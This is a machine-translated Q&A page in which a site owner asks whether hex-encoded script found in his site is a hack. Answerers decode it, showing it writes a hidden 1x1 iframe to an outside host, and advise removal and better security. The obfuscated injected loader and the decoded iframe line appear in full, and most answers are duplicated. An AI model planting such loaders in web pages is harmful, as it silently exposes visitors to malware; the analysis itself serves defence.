Fatal编程技术网
  • javascript/
  • Javascript 这可能是黑客攻击吗?

Javascript 这可能是黑客攻击吗?

javascript

Javascript 这可能是黑客攻击吗?,javascript,Javascript,前几天,我网站的问答部分宕机了,所以我关闭了索引,因为我发现错误与语法错误有关。所以我把它擦掉,让它死去。然而,当我打开它时,我发现: <script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d3637356561666563

前几天,我网站的问答部分宕机了,所以我关闭了索引,因为我发现错误与语法错误有关。所以我把它擦掉,让它死去。然而,当我打开它时,我发现:

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>httpdocs/');<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
是的,这看起来像是黑客入侵网站后混淆恶意代码的常见方法。它可以做很多事情,并且经常链接到中央服务器,以便以后可以修改其行为

要确定此代码的作用,我们只需运行它,将
eval
替换为
console.log
。这是打印出来的

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

document.write(“”)
该网站的URL和内容试图掩盖其目的。它提供的当前页面会进一步模糊。我有。它似乎在看你的浏览器和插件的版本,以针对你的访问者的病毒

有很多机器人在互联网上爬行,寻找易受攻击的软件版本,并像这样自动对其进行黑客攻击。通常情况下,要想找到他们并不简单,也不富有成效;下次只需专注于更加安全。

是的,这看起来像是黑客入侵网站后混淆恶意代码的常见方法。它可以做很多事情,并且经常链接到中央服务器,以便以后可以修改其行为

要确定此代码的作用,我们只需运行它,将
eval
替换为
console.log
。这是打印出来的

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

document.write(“”)
该网站的URL和内容试图掩盖其目的。它提供的当前页面会进一步模糊。我有。它似乎在看你的浏览器和插件的版本,以针对你的访问者的病毒

有很多机器人在互联网上爬行,寻找易受攻击的软件版本,并像这样自动对其进行黑客攻击。通常情况下,要想找到他们并不简单,也不富有成效;下次只需专注于更加安全。

它来自一个黑客

它的目的是攻击你

删除它,并升级防御。

它来自黑客

它的目的是攻击你

删除它,并升级你的防御。

是的,有人获得了访问权限并插入了它。它使用加密的javascript来修改页面。找出实际发生的情况的一个简单方法是用console.log()甚至alert()替换eval()——这将为您提供代码

我已经这样做了,这是代码添加到页面中的内容:

<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>
是的,有人获得了访问权限并插入了它。它使用加密的javascript来修改页面。找出实际发生的情况的一个简单方法是用console.log()甚至alert()替换eval()——这将为您提供代码

我已经这样做了,这是代码添加到页面中的内容:

<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>
这是通过wordpress、插件或服务器上运行的其他应用程序中的漏洞注入这些网站的代码

该代码在消除模糊后产生:

document.write('<iframe src="http://xxx/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

document.write(“”)
(为了安全,我编辑了域名;-)

这是通过wordpress、插件或服务器上运行的其他应用程序中的漏洞注入这些网站的代码

该代码在消除模糊后产生:

document.write('<iframe src="http://xxx/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

document.write(“”)
(我已经编辑了安全域;-)

如果您将
eval
更改为
console.log
,您将获得

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

document.write(“”)
该论坛帖子现在已被删除,因此实际上不会做任何事情,但是的,您已被黑客攻击。

如果您将
eval
更改为
控制台。log
,您将获得

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

document.write(“”)
该论坛帖子现在已被删除,因此实际上不会做任何事情,但是的,您已被黑客攻击。

我不知道它来自何处,因为可能的脚本是ECHP、WordPress或Question2答案我不知道它来自何处,因为可能的脚本是ECHP、WordPress,或问题2回答谢谢你的所有回答谢谢你的所有回答